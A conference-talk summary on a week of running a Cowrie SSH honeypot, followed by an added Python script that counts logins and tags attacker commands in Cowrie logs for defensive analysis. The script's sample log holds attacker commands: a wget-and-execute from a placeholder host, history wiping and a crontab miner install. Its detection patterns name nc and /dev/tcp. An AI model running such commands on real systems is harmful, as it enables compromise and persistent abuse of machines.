The Fault in Our Shells: A Weekly Overview Running Cowrie, presented at AppSecIndonesia2020

by Ewaldo Simon Hiras

Summary: I ran an SSH honeypot in a cloud environment for a week. I then dissected the results, focusing on two things. The first is the statistics: how many attacks happened, and other quantitative numbers. The second is the qualitative side: how the attackers behave and what kind of malware attacks. Most of the attacking malware are variants of Mirai bots; the attacks use brute force with commonly used wordlists/dictionaries, and some used default IoT logins. After gaining access, most of the malware do any or a combination of these activities: (1) fingerprint the OS, (2) download and run a payload, (3) contact a C2 server, (4) persistence/installing a service (miner), and (5) cleaning activities. Some malware failed miserably because of bad programming, but some were more successful. Due to the limitations of the honeypot, not much payload activity can be seen. The paper then concludes by showing the types of TTPs used, some funny failed scripts, and some tips on how to handle the types of malware this honeypot gets.
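The two kinds of analysis the summary describes, the quantitative counts and the qualitative tagging of post-login behaviour, can both be pulled out of Cowrie's JSON log (`cowrie.json`). The script below is an added example written for this page; it is not the speaker's code or part of the Cowrie project. It uses Cowrie's real event ids (`cowrie.session.connect`, `cowrie.login.failed`, `cowrie.login.success`, `cowrie.command.input`, `cowrie.session.file_download`), but the log lines are constructed, the URL and hash are placeholders, and the keyword rules that map a command to one of the five activities in the summary are my own rough heuristics, not a published classifier.

```python
import json
import re
from collections import Counter

# Constructed sample of Cowrie JSON log lines for demonstration only.
# Addresses are documentation ranges; the URL and shasum are placeholders.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"198.51.100.10"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"198.51.100.10","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"198.51.100.10","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.10","input":"cat /proc/cpuinfo | grep name | wc -l"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.10","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.10","input":"cd /tmp; wget http://example.invalid/x.sh; chmod +x x.sh; ./x.sh"}
{"eventid":"cowrie.session.file_download","session":"a1","src_ip":"198.51.100.10","url":"http://example.invalid/x.sh","shasum":"PLACEHOLDER_SHA256"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.10","input":"rm -rf /tmp/x.sh; history -c"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"203.0.113.7"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"203.0.113.7","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"203.0.113.7","username":"root","password":"123456"}
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"198.51.100.10"}
{"eventid":"cowrie.login.success","session":"c3","src_ip":"198.51.100.10","username":"pi","password":"raspberry"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"198.51.100.10","input":"crontab -l; echo '* * * * * /tmp/miner' | crontab -"}
"""

# Heuristic mapping from shell input to the five activities named in the
# summary. These patterns are assumptions made for this example.
TTP_RULES = [
    ("fingerprint", re.compile(r"\buname\b|\blscpu\b|\bnproc\b|/proc/cpuinfo|/etc/issue")),
    ("download_and_run", re.compile(r"\bwget\b|\bcurl\b|\btftp\b|chmod \+x")),
    ("c2_contact", re.compile(r"\bnc\b|\bncat\b|\btelnet\b|/dev/tcp/")),
    ("persistence", re.compile(r"\bcrontab\b|\bsystemctl\b|rc\.local|/etc/init\.d")),
    ("cleanup", re.compile(r"rm -rf|history -c|unset HISTFILE")),
]


def parse_events(text):
    """Parse one JSON object per line; skip blank or malformed lines instead of aborting."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def login_stats(events):
    """Quantitative side: sessions, login outcomes, sources and most-tried credentials."""
    failed = [e for e in events if e.get("eventid") == "cowrie.login.failed"]
    success = [e for e in events if e.get("eventid") == "cowrie.login.success"]
    creds = Counter((e.get("username"), e.get("password")) for e in failed + success)
    return {
        "sessions": len({e["session"] for e in events if e.get("eventid") == "cowrie.session.connect"}),
        "failed_logins": len(failed),
        "successful_logins": len(success),
        "unique_sources": len({e.get("src_ip") for e in events}),
        "top_credentials": creds.most_common(3),
    }


def classify_command(cmd):
    """Return the set of activity labels whose pattern matches this shell input."""
    return {name for name, rx in TTP_RULES if rx.search(cmd)}


def session_ttps(events):
    """Qualitative side: which activities each successful session performed."""
    per_session = {}
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            per_session.setdefault(e["session"], set()).update(classify_command(e.get("input", "")))
    return per_session


def ttp_prevalence(events):
    """How many sessions showed each activity (one count per session, not per command)."""
    counts = Counter()
    for labels in session_ttps(events).values():
        counts.update(labels)
    return counts


def downloads(events):
    """Payload URLs and hashes Cowrie captured; the hashes are what you would triage next."""
    return [(e.get("url"), e.get("shasum")) for e in events if e.get("eventid") == "cowrie.session.file_download"]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print(login_stats(evs))
    print(session_ttps(evs))
    print(ttp_prevalence(evs))
    print(downloads(evs))
```

Against a real week of `cowrie.json` you would read the file instead of `SAMPLE_LOG`; counting activities per session rather than per command keeps a bot that retries `wget` twenty times from dominating the prevalence table, which is the kind of distortion the summary's "some malware failed miserably" sessions would otherwise introduce.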